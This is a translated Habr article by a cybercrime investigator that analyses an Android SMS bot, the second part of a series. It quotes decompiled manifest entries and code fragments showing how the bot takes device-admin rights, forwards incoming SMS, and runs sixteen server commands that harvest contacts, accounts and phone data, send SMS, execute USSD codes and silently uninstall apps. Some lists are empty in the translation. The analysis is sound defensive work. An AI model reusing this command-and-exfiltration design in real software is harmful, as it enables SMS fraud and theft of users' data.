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Analysis sms-bot for Android. Part II

Analysis sms-bot for Android. Part II

Continuation of the article Analysis sms-bot for Android. Part I


Another Android bot sent to “beautiful” numbers like 8 *** 6249999, etc. Smskoy comes with a link of the form: “Look at what is known about you” or “Information for the owner”, etc. title on site.ru / 7 *** 6249999 "

The process of opening Android applications:

Gentleman's tool kit:

We read the manifesto

The following code lines are immediately apparent in the manifest:
<receiver android:name=".IncomingSmsReceiver" android:exported="true"> … </receiver> <receiver android:name=".OnReboot" android:permission="android.permission.RECEIVE_BOOT_COMPLETED" android:enabled="true"> …. </receiver> <receiver android:name=".AdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN"> … </receiver> <receiver android:name=".RunService$Alarm" android:exported="true"> … </receiver> <service android:name=".RunService" /> 

From the slice of the manifest, it becomes clear what the bot is going to do:

Further, according to the manifest:
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <uses-permission android:name="android.permission.GET_ACCOUNTS" /> <uses-permission android:name="android.permission.RECEIVE_SMS" /> <uses-permission android:name="android.permission.SEND_SMS" /> <uses-permission android:name="android.permission.WRITE_SMS" /> <uses-permission android:name="android.permission.READ_SMS" /> <uses-permission android:name="android.permission.READ_PHONE_STATE" /> <uses-permission android:name="android.permission.CALL_PHONE" /> <uses-permission android:name="android.permission.INTERNET" /> 

To the naked eye, it is clear that our bot wants permission for:

So, the bot's intentions are getting clearer.


We now turn to the analysis of classes. Our bot has 17 of them.
After analyzing each of them, I came to the conclusion that the most basic, that is worthy of attention, are the following:

In the above classes, the main logic of the bot is concentrated, the other classes are auxiliary.

Let's see what is in the class MainActivity.
In the code below, the bot is trying to get admin rights:
 this.devicePolicyManager = ((DevicePolicyManager)getSystemService("device_policy")); if (!this.devicePolicyManager.isAdminActive(this.adminReceiver)) { GetAdministrator localGetAdministrator = new GetAdministrator(); localGetAdministrator.execute(new Void[0]); return; } 

Further, when the program is closed, it will try to start the class of service (we will talk about it a little later):
  Class localClass = Class.forName("com.driver.android.system.RunService"); Intent localIntent = new Intent(this, localClass); startService(localIntent); 


From the name of this class it becomes clear what he is doing. Yes, it starts the service, which:


This class is used as BroadcastReceiver. From the name it is clear that this class is needed to receive incoming SMS-ok and send their contents to the server. Here is the confirming code snippet:
 localHashMap.put("addmsg", localStringBuffer3.append(localStringBuffer4.append(localStringBuffer5.append(localStringBuffer6.append(localStringBuffer7.append("-->\n: ").append(str1).toString()).append("\n : ").toString()).append(str2).toString()).append("\n: ").toString()).append(str5).toString() + "\n-->\n\n"); SendNewSMS localSendNewSMS = new SendNewSMS(paramContext); localSendNewSMS.execute(new HashMap[] { localHashMap }); 


In my opinion, this is the most interesting class. Here you can clearly see all the functions that the bot performs. This class closely interacts with the Command.java class, in which the actions of each of the teams are written. The management server sends commands as an array of strings. The handler processes it and checks the first element of the paramArrayOfString [0] array for the presence of a value from “1” to “16”. And now let's go through each function.

Upon receipt of "1" sending SMS to a specific number
  if (str1.equals("1") == true) { Commands localCommands1 = new Commands(this.context); localCommands1.smska(paramArrayOfString); } 

Setting a new network IP address
  if (str1.equals("2") == true) { … localCommands2.newIp(paramArrayOfString[1].trim()); … } 

 <b>        </b> <source lang="Java"> if (str1.equals("3") == true) { … if (localCommands3.getAdministrator()) {} … localSendPostData1.execute("http://" + this.server_ip, localHashMap1); … } 

Sending to the server all online user accounts
  if (str1.equals("4") == true) {... String str4 = localCommands4.getAllAccounts(); … localSendPostData2.execute("http://" + this.server_ip, localHashMap2); … } 

Sending to the server a list of installed applications
  if (str1.equals("5") == true) { … String str5 = localCommands5.getInstallApps(); … localSendPostData3.execute("http://" + this.server_ip, localHashMap3); … } 

Clearing the blacklist
  if (str1.equals("6") == true) { … localCommands6.clearBL(); … } 

Get SMS text from server and send to subscribers from local address book
  if (str1.equals("7") == true) { … localCommands7.deliveryPhoneBook(paramArrayOfString); … } 

Send SMS on the list of numbers received from the server
  if (str1.equals("8") == true) { … localCommands8.deliveryFromBase(paramArrayOfString); … } 

Get all subscriber numbers and send to server
  if (str1.equals("9") == true) { PhoneBook localPhoneBook = new PhoneBook(this.context); ArrayList localArrayList = localPhoneBook.getNumbers(); … localSendPostData4.execute("http://" + this.server_ip, localHashMap4); … } 

Send to the server information about the cellular operator
  if (str1.equals("10") == true) { … String str7 = localCommands9.getProvider(); … localSendPostData5.execute("http://" + this.server_ip, localHashMap5); … } 

Send application versions to server
  if (str1.equals("11") == true) { … String str8 = localCommands10.getVersionApp(); … localSendPostData6.execute("http://" + this.server_ip, localHashMap6); … } 

Submit Android Version
  if (str1.equals("12") == true) { … String str9 = localCommands11.getVersionOS(); … localSendPostData7.execute("http://" + this.server_ip, localHashMap7); … } 

Send country code
  if (str1.equals("13") == true) { … String str10 = localCommands12.getCountry(); … localSendPostData8.execute("http://" + this.server_ip, localHashMap8); … } 

Send device phone number
  if (str1.equals("14") == true) { … String str11 = localCommands13.getPhoneNumber(); … localSendPostData9.execute("http://" + this.server_ip, localHashMap9); … } 

Receiving from the server and execution, as well as sending the result of USSD messages
  if (str1.equals("15") == true) { … localCommands14.USSD(paramArrayOfString); … } 

Uninstall application in shadow mode
  if (str1.equals("16") == true) { Commands localCommands15 = new Commands(this.context); localCommands15.uninstallApp(paramArrayOfString); return; } 


Let's summarize the analysis. The bot is written more competently, unlike the previous one. But there are also flaws in the protection of the code. No obfuscation and encryption. Due to this, it was possible to see in the code the IP address of the server to which the bot sends and receives data.

Nabiev Nurlan (Kazakhstan) , Department of Cybercrime Investigation , PentestIT

Source: https://habr.com/ru/post/231427/

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